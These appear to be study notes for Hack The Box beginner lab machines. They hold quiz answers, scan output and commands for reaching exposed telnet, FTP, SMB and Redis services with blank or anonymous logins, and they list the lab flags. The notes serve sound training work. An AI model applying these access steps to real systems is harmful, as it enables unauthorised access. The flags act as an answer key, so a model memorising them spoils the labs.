HTBLTP

Meow

What does the acronym VM stand for?
Virtual Machine
What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell.
terminal
What service do we use to form our VPN connection into HTB labs?
openvpn
What tool do we use to test our connection to the target with an ICMP echo request?
ping
What is the name of the most common tool for finding open ports on a target?
nmap
What service do we identify on port 23/tcp during our scans?
telnet
What username is able to log into the target over telnet with a blank password?
root
Submit root flag
b40abdfe23665f766f9c61ecba8a4c19

Fawn

What does the 3-letter acronym FTP stand for?
File Transfer Protocol
Which port does the FTP service listen on usually?
21
FTP sends data in the clear, without any encryption. What acronym is used for a later protocol designed to provide similar functionality to FTP but securely, as an extension of the SSH protocol?
sftp
What is the command we can use to send an ICMP echo request to test our connection to the target?
ping
From your scans, what version is FTP running on the target?
vsftpd 3.0.3

commands

$ sudo nmap -sV 10.129.74.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 14:37 UTC
Nmap scan report for 10.129.74.149
Host is up (0.35s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
Service Info: OS: Unix

From your scans, what OS type is running on the target?
Unix
What is the command we need to run in order to display the ‘ftp’ client help menu?
ftp -?
What is the username that is used over FTP when you want to log in without having an account?
anonymous
What is the response code we get for the FTP message ‘Login successful’?
230

commands

$ ftp -p anonymous@10.129.74.149 
Connected to 10.129.74.149.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

There are a couple of commands we can use to list the files and directories available on the FTP server. One is dir. What is the other that is a common way to list files on a Linux system?
ls
What is the command used to download the file we found on the FTP server?
get
Submit root flag
035db21c881520061c53e0536e44f815

commands

ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||65431|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |**********************************************************************************************************************************************************************| 32 0.16 KiB/s 00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.03 KiB/s)

Dancing

What does the 3-letter acronym SMB stand for?
Server Message Block
What port does SMB use to operate at?
445
What is the service name for port 445 that came up in our Nmap scan?
microsoft-ds

commands

$ nmap 10.129.115.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 01:30 UTC
Stats: 0:00:46 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 13.41% done; ETC: 01:35 (0:04:12 remaining)
Nmap scan report for 10.129.115.132
Host is up (1.9s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
445/tcp   open     microsoft-ds
10025/tcp filtered unknown

What is the ‘flag’ or ‘switch’ that we can use with the smbclient utility to ‘list’ the available shares on Dancing?
-L

commands

$ smbclient --no-pass -L 10.129.115.132

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
WorkShares      Disk

How many shares are there on Dancing?
4
What is the name of the share we are able to access in the end with a blank password?
WorkShares
What is the command we can use within the SMB shell to download the files we find?
get
Submit root flag
5f61c10dffbc77a704d76016a22f1664

commands

$ smbclient --no-pass //10.129.115.132/WorkShares
smb: \> ls
.        D  0  Mon Mar 29 08:22:01 2021
..       D  0  Mon Mar 29 08:22:01 2021
Amy.J    D  0  Mon Mar 29 09:08:24 2021
James.P  D  0  Thu Jun  3 08:38:03 2021
smb: \> cd James.P
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \James.P\> quit

Redeemer

Which TCP port is open on the machine?
6379

commands

$ rustscan -a 10.129.7.120
PORT     STATE SERVICE REASON
6379/tcp open  redis   syn-ack

Which service is running on the port that is open on the machine?
redis
What type of database is Redis? Choose from the following options: (i) In-memory Database, (ii) Traditional Database
In-memory Database
Which command-line utility is used to interact with the Redis server? Enter the program name you would enter into the terminal without any arguments.
redis-cli
Which flag is used with the Redis command-line utility to specify the hostname?
-h
Once connected to a Redis server, which command is used to obtain the information and statistics about the Redis server?
info
What is the version of the Redis server being used on the target machine?
5.0.7

commands

$ redis-cli -h 10.129.7.120 info | grep redis_version

redis_version:5.0.7

Which command is used to select the desired database in Redis?
select
How many keys are present inside the database with index 0?
4

commands

$ redis-cli -h 10.129.7.120 -n 0 keys '*'
1) "flag"
2) "numb"
3) "stor"
4) "temp"

Which command is used to obtain all the keys in a database?
keys *
Submit root flag
03e1d2b376c37ab3f5319922053953eb

commands

$ redis-cli -h 10.129.7.120 -n 0 get 'flag' 
"03e1d2b376c37ab3f5319922053953eb"

Explosion (VIP)

Preignition (VIP)

Mongod (VIP)

Synced (VIP)